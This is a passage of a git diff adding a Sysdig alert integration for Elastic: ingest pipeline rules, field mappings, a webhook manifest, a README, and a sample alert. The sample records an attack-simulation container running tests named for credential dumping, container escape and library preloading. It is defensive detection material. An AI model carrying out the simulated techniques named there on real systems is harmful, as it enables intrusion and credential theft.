field: json + target_field: sysdig +- dot_expander: + field: '*' + path: sysdig.content + tag: 'Primary doc_expander for sysdig.content' + ignore_failure: true +- dot_expander: + field: '*' + path: sysdig.labels + tag: 'Primary doc_expander for sysdig.labels' + ignore_failure: true +- set: + field: event.id + copy_from: sysdig.id + ignore_empty_value: true +- set: + field: event.provider + copy_from: sysdig.source + ignore_empty_value: true +- set: + field: event.severity + copy_from: sysdig.severity + ignore_empty_value: true +- set: + field: log.syslog.severity.code + copy_from: sysdig.severity + ignore_empty_value: true +- set: + field: log.syslog.severity.name + value: "emergency" + if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 0" +- set: + field: log.syslog.severity.name + value: "alert" + if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 1" +- set: + field: log.syslog.severity.name + value: "critical" + if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 2" +- set: + field: log.syslog.severity.name + value: "error" + if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 3" +- set: + field: log.syslog.severity.name + value: "warning" + if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 4" +- set: + field: log.syslog.severity.name + value: "notice" + if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 5" +- set: + field: log.syslog.severity.name + value: "informational" + if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 6" +- set: + field: log.syslog.severity.name + value: "debug" + if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 7" +- set: + field: rule.author + value: ["{{sysdig.content.policyOrigin}}"] + ignore_empty_value: true +- set: + field: rule.name + copy_from: sysdig.content.ruleName + ignore_empty_value: true +- convert: + target_field: rule.version + field: sysdig.content.policyVersion + type: string + ignore_missing: true +- set: + field: rule.category + copy_from: sysdig.content.ruleType + ignore_empty_value: true +- set: + field: rule.ruleset + copy_from: sysdig.name + ignore_empty_value: true +- set: + field: sysdig.event.description + copy_from: sysdig.description + ignore_empty_value: true +- set: + field: sysdig.event.category + copy_from: sysdig.category + ignore_empty_value: true +- set: + field: sysdig.event.type + copy_from: sysdig.type + ignore_empty_value: true +- set: + field: tags + copy_from: sysdig.content.ruleTags + ignore_empty_value: true +- convert: + target_field: agent.id + field: sysdig.agentId + type: string + ignore_missing: true +- set: + field: host.id + copy_from: sysdig.machineId + ignore_empty_value: true +- append: + field: host.mac + value: "{{{sysdig.hostMac}}}" + if: ctx.sysdig?.hostMac != null +- gsub: + field: host.mac + pattern: '[-:.]' + replacement: '-' + ignore_missing: true +- uppercase: + field: host.mac + ignore_missing: true +- set: + field: host.name + copy_from: sysdig.labels.host.hostName + ignore_empty_value: true +- set: + field: container.id + copy_from: sysdig.containerId + ignore_empty_value: true +- set: + field: container.image.tag + copy_from: sysdig.content.fields.container.image.tag + ignore_empty_value: true +- set: + field: container.image.name + copy_from: sysdig.content.fields.container.name + ignore_empty_value: true +- set: + field: rule.ruleset + copy_from: sysdig.name + ignore_empty_value: true +- set: + field: message + copy_from: sysdig.content.output + ignore_empty_value: true +- set: + field: process.executable + copy_from: sysdig.content.fields.proc.exepath + ignore_empty_value: true +- set: + field: process.working_directory + copy_from: sysdig.content.fields.proc.cwd + ignore_empty_value: true +- set: + field: process.pid + copy_from: sysdig.content.fields.proc.pid + ignore_empty_value: true +- set: + field: process.name + copy_from: sysdig.content.fields.proc.name + ignore_empty_value: true +- set: + field: process.command_line + copy_from: sysdig.content.fields.proc.cmdline + ignore_empty_value: true +- set: + field: process.parent.pid + copy_from: sysdig.content.fields.proc.ppid + ignore_empty_value: true +- set: + field: process.parent.name + copy_from: sysdig.content.fields.proc.pname + ignore_empty_value: true +- set: + field: process.parent.command_line + copy_from: sysdig.content.fields.proc.pcmdline + ignore_empty_value: true +- set: + field: user.id + copy_from: sysdig.content.fields.user.uid + ignore_empty_value: true +- set: + field: user.name + copy_from: sysdig.content.fields.user.name + ignore_empty_value: true +- script: + lang: painless + tag: 'painless_set_threat_technique_id' + if: ctx.sysdig?.content?.ruleTags != null + source: | + def mitreRegex = /T\d{4}/; + for (int i = 0; i < ctx.sysdig.content.ruleTags.length; i++) { + def tag = ctx.sysdig.content.ruleTags[i]; + def matcher = mitreRegex.matcher(tag); + if (matcher.find()) { + ctx['threat.technique.id'] = [matcher.group()]; + break; + } + } +- set: + field: cloud.account.id + copy_from: sysdig.labels.cloudProvider.account.id + ignore_empty_value: true +- set: + field: cloud.availability_zone + copy_from: sysdig.labels.gcp.availabilityZone + ignore_empty_value: true + if: ctx.sysdig?.labels?.cloudProvider?.name != null && ctx.sysdig?.labels?.cloudProvider?.name == "gcp" +- set: + field: cloud.instance.id + copy_from: sysdig.labels.gcp.instanceId + ignore_empty_value: true + if: ctx.sysdig?.labels?.gcp?.instanceId != null +- set: + field: cloud.instance.id + copy_from: sysdig.labels.azure.instanceId + ignore_empty_value: true + if: ctx.sysdig?.labels?.azure?.instanceId != null +- set: + field: cloud.instance.name + copy_from: sysdig.labels.gcp.instanceName + ignore_empty_value: true + if: ctx.sysdig?.labels?.gcp?.instanceName != null +- set: + field: cloud.instance.name + copy_from: sysdig.labels.gcp.instanceName + ignore_empty_value: true + if: ctx.sysdig?.labels?.azure?.instanceName != null +- set: + field: cloud.machine.type + copy_from: sysdig.labels.gcp.machineType + ignore_empty_value: true + if: ctx.sysdig?.labels?.gcp?.machineType != null +- set: + field: cloud.machine.type + copy_from: sysdig.labels.azure.instanceSize + ignore_empty_value: true + if: ctx.sysdig?.labels?.azure?.instanceSize != null +- set: + field: cloud.project.id + copy_from: sysdig.labels.gcp.projectId + ignore_empty_value: true +- set: + field: cloud.project.name + copy_from: sysdig.labels.gcp.projectName + ignore_empty_value: true +- set: + field: cloud.provider + copy_from: sysdig.labels.cloudProvider.name + ignore_empty_value: true +- set: + field: cloud.region + copy_from: sysdig.labels.cloudProvider.region + ignore_empty_value: true +- set: + field: orchestrator.cluster.name + copy_from: sysdig.labels.kubernetes.cluster.name + ignore_empty_value: true +- set: + field: orchestrator.namespace + copy_from: sysdig.labels.kubernetes.namespace.name + ignore_empty_value: true +- set: + field: orchestrator.resource.name + copy_from: sysdig.labels.kubernetes.pod.name + ignore_empty_value: true +- set: + field: orchestrator.resource.parent.type + copy_from: sysdig.labels.kubernetes.workload.type + ignore_empty_value: true +- set: + field: orchestrator.type + value: kubernetes + if: >- + ctx.sysdig?.labels?.kubernetes?.cluster?.name != null || + ctx.sysdig?.labels?.kubernetes?.namespace?.name != null || + ctx.sysdig?.labels?.kubernetes?.pod?.name != null || + ctx.sysdig?.labels?.kubernetes?.workload?.type != null +on_failure: +- append: + field: error.message + value: 'Processor "{{ _ingest.on_failure_processor_type }}" with tag "{{ _ingest.on_failure_processor_tag }}" in pipeline "{{ _ingest.on_failure_pipeline }}" failed with message "{{ _ingest.on_failure_message }}"' +- set: + field: event.kind + value: pipeline_error \ No newline at end of file diff --git a/packages/sysdig/data_stream/alerts/fields/base-fields.yml b/packages/sysdig/data_stream/alerts/fields/base-fields.yml new file mode 100644 index 00000000000..72b280dd8a5 --- /dev/null +++ b/packages/sysdig/data_stream/alerts/fields/base-fields.yml @@ -0,0 +1,24 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. + value: 'logs' +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. + value: 'sysdig.alerts' +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.dataset + type: constant_keyword + description: Data stream / event dataset. + value: 'sysdig.alerts' +- name: event.module + type: constant_keyword + description: The module the event belongs to. + value: sysdig +- name: input.type + type: constant_keyword +- name: '@timestamp' + type: date + description: Event timestamp with nanos. diff --git a/packages/sysdig/data_stream/alerts/fields/fields.yml b/packages/sysdig/data_stream/alerts/fields/fields.yml new file mode 100644 index 00000000000..498f7734245 --- /dev/null +++ b/packages/sysdig/data_stream/alerts/fields/fields.yml @@ -0,0 +1,176 @@ +- name: sysdig + type: group + description: Namespace for Sysdig-specific fields. + dynamic: false + fields: + - name: actions + type: flattened + - name: agentId + type: integer + description: Agent identifier + - name: category + type: keyword + description: Event category from Sysdig + - name: containerId + type: text + description: Identifier of the container + - name: content + type: group + dynamic: false + description: Preserved Sysdig fields + fields: + - name: fields + type: group + dynamic: false + fields: + - name: container.image.tag + type: text + description: Tag for the container image + - name: container.name + type: text + description: Name of the container + - name: proc.exepath + type: text + description: Path for the current process + - name: proc.cwd + type: text + description: Current working directory for the current process + - name: proc.pid + type: text + description: Identifier for the process + - name: proc.name + type: text + description: Name of the process + - name: proc.cmdline + type: text + description: Command line args for the process + - name: proc.ppid + type: text + description: Identifier for the parent process + - name: proc.pname + type: text + description: Name of the parent process + - name: proc.pcmdline + type: text + description: Command line args for the parent process + - name: user.uid + type: text + description: Identifier for the user + - name: user.name + type: text + description: Name of the user + - name: output + type: text + description: The raw event output + - name: policyOrigin + type: text + description: Originator of the rule associated with an event + - name: policyVersion + type: integer + description: Version of the rule associated with an event + - name: ruleName + type: text + description: Name of the rule associated with an event + - name: ruleTags + type: text + description: Tags associated with an event rule + - name: ruleType + type: text + description: Category of the rule associated with an event + - name: description + type: text + description: Description of the event policy + - name: event + type: group + description: Fields specific to the actual event details + dynamic: false + fields: + - name: description + type: text + - name: category + type: text + - name: type + type: text + - name: hostMac + type: text + description: MAC address of the host machine + - name: id + type: text + description: Event identifier + - name: labels + type: group + dynamic: false + fields: + - name: azure.instanceId + type: text + description: Instance identifier for the azure instance + - name: azure.instanceName + type: text + description: Instance name for the azure instance + - name: azure.instanceSize + type: text + description: Size for the azure instance + - name: cloudProvider.account.id + type: text + description: Account identifier for the cloud provider + - name: cloudProvider.name + type: text + description: Name for the cloud provider + - name: cloudProvider.region + type: text + description: Region for the cloud provider + - name: host.hostName + type: keyword + description: Name of the current host + - name: gcp.availabilityZone + type: text + description: AZ for the gcp instance + - name: gcp.instanceId + type: text + description: Instance identifier for the gcp instance + - name: gcp.instanceName + type: text + description: Instance name for the gcp instance + - name: gcp.machineType + type: text + description: Machine type for the gcp instance + - name: gcp.projectId + type: text + description: Project identifier for the gcp instance + - name: gcp.projectName + type: text + description: Project name for the gcp instance + - name: kubernetes.cluster.name + type: text + description: Name of the k8s cluster + - name: kubernetes.namespace.name + type: text + description: Namespace of the k8s cluster + - name: kubernetes.pod.name + type: text + description: Name of the k8s pod + - name: kubernetes.workload.type + type: text + description: Type of k8s resource + - name: machineId + type: text + description: Identifier of the host machine + - name: name + type: text + description: Name of the event policy + - name: originator + type: text + - name: severity + type: integer + description: Numerical severity value associated with an event + - name: source + type: text + description: Event source + - name: timestamp + type: date + description: Timestamp of the event + - name: timestampRFC3339Nano + type: date + - name: type + type: text + description: In the case of policies, value should come through as "policy" diff --git a/packages/sysdig/data_stream/alerts/manifest.yml b/packages/sysdig/data_stream/alerts/manifest.yml new file mode 100644 index 00000000000..135192178c8 --- /dev/null +++ b/packages/sysdig/data_stream/alerts/manifest.yml @@ -0,0 +1,89 @@ +title: "Sysdig" +type: logs +streams: + - input: http_endpoint + enabled: false + template_path: http.yml.hbs + title: HTTP input + description: Collect Sysdig Alerts over an HTTP Webhook + vars: + - name: listen_address + type: text + title: Listen Address + description: | + Bind address for the HTTP listener. Use 0.0.0.0 to listen on all interfaces. + required: true + show_user: true + default: localhost + - name: listen_port + type: text + title: Listen port + description: | + Bind port for the listener. + required: true + show_user: true + default: 9035 + - name: url + type: text + title: URL + description: This options specific which URL path to accept requests on. Defaults to /. + required: false + show_user: true + - name: secret_header + type: text + title: Secret Header + description: The header to check for a specific value specified by `secret.value`. + required: false + show_user: false + secret: false + - name: secret_value + type: password + title: Secret Value + description: The secret stored in the header name specified by `secret.header`. + required: false + show_user: false + secret: true + - name: ssl + type: yaml + title: TLS + description: Options for enabling TLS for the listening webhook endpoint. See the [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/configuration-ssl.html) for a list of all options. + multi: false + required: false + show_user: false + default: | + # enabled: false + # certificate: "/etc/pki/client/cert.pem" + # key: "/etc/pki/client/cert.key" + - name: preserve_original_event + type: bool + title: Preserve Original Event + description: This option copies the raw unmodified body of the incoming request to the event.original field as a string before sending the event to Elasticsearch. + required: false + show_user: true + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: | + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: tags + type: text + title: Tags + description: Tags to include in the published event + required: false + default: + - forwarded + - sysdig-alerts + multi: true + show_user: true + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: >- + The request tracer logs HTTP requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_resource_tracer_filename) for details. diff --git a/packages/sysdig/data_stream/alerts/sample_event.json b/packages/sysdig/data_stream/alerts/sample_event.json new file mode 100644 index 00000000000..e757c0927fc --- /dev/null +++ b/packages/sysdig/data_stream/alerts/sample_event.json @@ -0,0 +1,200 @@ +{ + "@timestamp": "2024-09-12T13:06:12.675Z", + "agent": { + "ephemeral_id": "fe172d2f-7b14-4b87-bc5a-acc14684e4c5", + "id": "58014837", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.14.1" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "data_stream": { + "dataset": "sysdig.alerts", + "namespace": "15372", + "type": "logs" + }, + "ecs": { + "version": "8.0.0" + }, + "elastic_agent": { + "id": "a2d71da8-f67f-43fa-a895-0251c4a68bb0", + "snapshot": false, + "version": "8.14.1" + }, + "event": { + "agent_id_status": "mismatch", + "dataset": "sysdig.alerts", + "id": "17dec715376910362c8c3f62a4ceda2e", + "ingested": "2024-09-12T13:06:22Z", + "kind": "alert", + "provider": "syscall", + "severity": 7, + "timezone": "+00:00" + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "input": { + "type": "http_endpoint" + }, + "log": { + "syslog": { + "severity": { + "code": 7, + "name": "debug" + } + } + }, + "message": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "User Management Event Detected", + "ruleset": "Sysdig Runtime Activity Logs", + "version": "35" + }, + "sysdig": { + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "userdel tmp_suid_user", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/sbin/userdel", + "proc.name": "userdel", + "proc.pcmdline": "pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC)", + "proc.pid": "2140169", + "proc.pname": "pwsh", + "proc.ppid": "2140088", + "user.name": "root", + "user.uid": "0" + }, + "output": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "policyOrigin": "Sysdig", + "policyVersion": 35, + "ruleName": "User Management Event Detected", + "ruleTags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "event": { + "category": "runtime", + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec715376910362c8c3f62a4ceda2e", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "severity": 7, + "source": "syscall", + "timestamp": 1720031001639981000, + "timestampRFC3339Nano": "2024-07-03T18:23:21.63998111Z", + "type": "policy" + }, + "tags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "threat.technique.id": [ + "T1136" + ] +} \ No newline at end of file diff --git a/packages/sysdig/docs/README.md b/packages/sysdig/docs/README.md new file mode 100644 index 00000000000..34f82f7b1f2 --- /dev/null +++ b/packages/sysdig/docs/README.md @@ -0,0 +1,305 @@ +# Sysdig Integration +This integration allows for the shipping of [Sysdig](https://sysdig.com/) alerts to Elastic for observability and organizational awareness. Alerts can then be analyzed by using either the dashboard included with the integration or via the creation of custom dashboards within Kibana. + +## Data Streams +The Sysdig integration collects one type of data stream: alerts. + +**Alerts** The Alerts data stream collected by the Sysdig integration is comprised of Sysdig Alerts. See more details about Sysdig Alerts in [Sysdig's Alerts Documentation](https://docs.sysdig.com/en/docs/sysdig-monitor/alerts/). A complete list of potential fields used by this integration can be found in the [Logs reference](#logs-reference) + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +Sysdig must be configured to output alerts to a supported output channel as defined in [Setup](#setup). The system will only receive common fields output by Sysdig's rules, meaning that if a rule does not include a desired field the rule must be edited in Sysdig to add the field. + +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +In order to capture alerts from Sysdig you **must** configure Sysdig to output Alerts as JSON via [HTTP](#http-input). + +### HTTP Input + +The HTTP input allows the Elastic Agent to receive Sysdig Alerts via HTTP webhook. + +**Required:** To configure Sysdig to output JSON, you must set up as webhook notification channel as outlined in the [Sysdig Documentation](https://docs.sysdig.com/en/docs/administration/administration-settings/outbound-integrations/notifications-management/set-up-notification-channels/configure-a-webhook-channel/). + +## Logs Reference + +### alerts + +Sysdig alerts can contain a multitude of various fields pertaining to the type of activity on the host machine. + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp with nanos. | date | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| event.dataset | Data stream / event dataset. | constant_keyword | +| event.module | The module the event belongs to. | constant_keyword | +| input.type | | constant_keyword | +| sysdig.actions | | flattened | +| sysdig.agentId | Agent identifier | integer | +| sysdig.category | Event category from Sysdig | keyword | +| sysdig.containerId | Identifier of the container | text | +| sysdig.content.fields.container.image.tag | Tag for the container image | text | +| sysdig.content.fields.container.name | Name of the container | text | +| sysdig.content.fields.proc.cmdline | Command line args for the process | text | +| sysdig.content.fields.proc.cwd | Current working directory for the current process | text | +| sysdig.content.fields.proc.exepath | Path for the current process | text | +| sysdig.content.fields.proc.name | Name of the process | text | +| sysdig.content.fields.proc.pcmdline | Command line args for the parent process | text | +| sysdig.content.fields.proc.pid | Identifier for the process | text | +| sysdig.content.fields.proc.pname | Name of the parent process | text | +| sysdig.content.fields.proc.ppid | Identifier for the parent process | text | +| sysdig.content.fields.user.name | Name of the user | text | +| sysdig.content.fields.user.uid | Identifier for the user | text | +| sysdig.content.output | The raw event output | text | +| sysdig.content.policyOrigin | Originator of the rule associated with an event | text | +| sysdig.content.policyVersion | Version of the rule associated with an event | integer | +| sysdig.content.ruleName | Name of the rule associated with an event | text | +| sysdig.content.ruleTags | Tags associated with an event rule | text | +| sysdig.content.ruleType | Category of the rule associated with an event | text | +| sysdig.description | Description of the event policy | text | +| sysdig.event.category | | text | +| sysdig.event.description | | text | +| sysdig.event.type | | text | +| sysdig.hostMac | MAC address of the host machine | text | +| sysdig.id | Event identifier | text | +| sysdig.labels.azure.instanceId | Instance identifier for the azure instance | text | +| sysdig.labels.azure.instanceName | Instance name for the azure instance | text | +| sysdig.labels.azure.instanceSize | Size for the azure instance | text | +| sysdig.labels.cloudProvider.account.id | Account identifier for the cloud provider | text | +| sysdig.labels.cloudProvider.name | Name for the cloud provider | text | +| sysdig.labels.cloudProvider.region | Region for the cloud provider | text | +| sysdig.labels.gcp.availabilityZone | AZ for the gcp instance | text | +| sysdig.labels.gcp.instanceId | Instance identifier for the gcp instance | text | +| sysdig.labels.gcp.instanceName | Instance name for the gcp instance | text | +| sysdig.labels.gcp.machineType | Machine type for the gcp instance | text | +| sysdig.labels.gcp.projectId | Project identifier for the gcp instance | text | +| sysdig.labels.gcp.projectName | Project name for the gcp instance | text | +| sysdig.labels.host.hostName | Name of the current host | keyword | +| sysdig.labels.kubernetes.cluster.name | Name of the k8s cluster | text | +| sysdig.labels.kubernetes.namespace.name | Namespace of the k8s cluster | text | +| sysdig.labels.kubernetes.pod.name | Name of the k8s pod | text | +| sysdig.labels.kubernetes.workload.type | Type of k8s resource | text | +| sysdig.machineId | Identifier of the host machine | text | +| sysdig.name | Name of the event policy | text | +| sysdig.originator | | text | +| sysdig.severity | Numerical severity value associated with an event | integer | +| sysdig.source | Event source | text | +| sysdig.timestamp | Timestamp of the event | date | +| sysdig.timestampRFC3339Nano | | date | +| sysdig.type | In the case of policies, value should come through as "policy" | text | + + +**Example event** + +An example event for `alerts` looks as following: + +```json +{ + "@timestamp": "2024-09-12T13:06:12.675Z", + "agent": { + "ephemeral_id": "fe172d2f-7b14-4b87-bc5a-acc14684e4c5", + "id": "58014837", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.14.1" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "data_stream": { + "dataset": "sysdig.alerts", + "namespace": "15372", + "type": "logs" + }, + "ecs": { + "version": "8.0.0" + }, + "elastic_agent": { + "id": "a2d71da8-f67f-43fa-a895-0251c4a68bb0", + "snapshot": false, + "version": "8.14.1" + }, + "event": { + "agent_id_status": "mismatch", + "dataset": "sysdig.alerts", + "id": "17dec715376910362c8c3f62a4ceda2e", + "ingested": "2024-09-12T13:06:22Z", + "kind": "alert", + "provider": "syscall", + "severity": 7, + "timezone": "+00:00" + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "input": { + "type": "http_endpoint" + }, + "log": { + "syslog": { + "severity": { + "code": 7, + "name": "debug" + } + } + }, + "message": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "User Management Event Detected", + "ruleset": "Sysdig Runtime Activity Logs", + "version": "35" + }, + "sysdig": { + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "userdel tmp_suid_user", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/sbin/userdel", + "proc.name": "userdel", + "proc.pcmdline": "pwsh -c 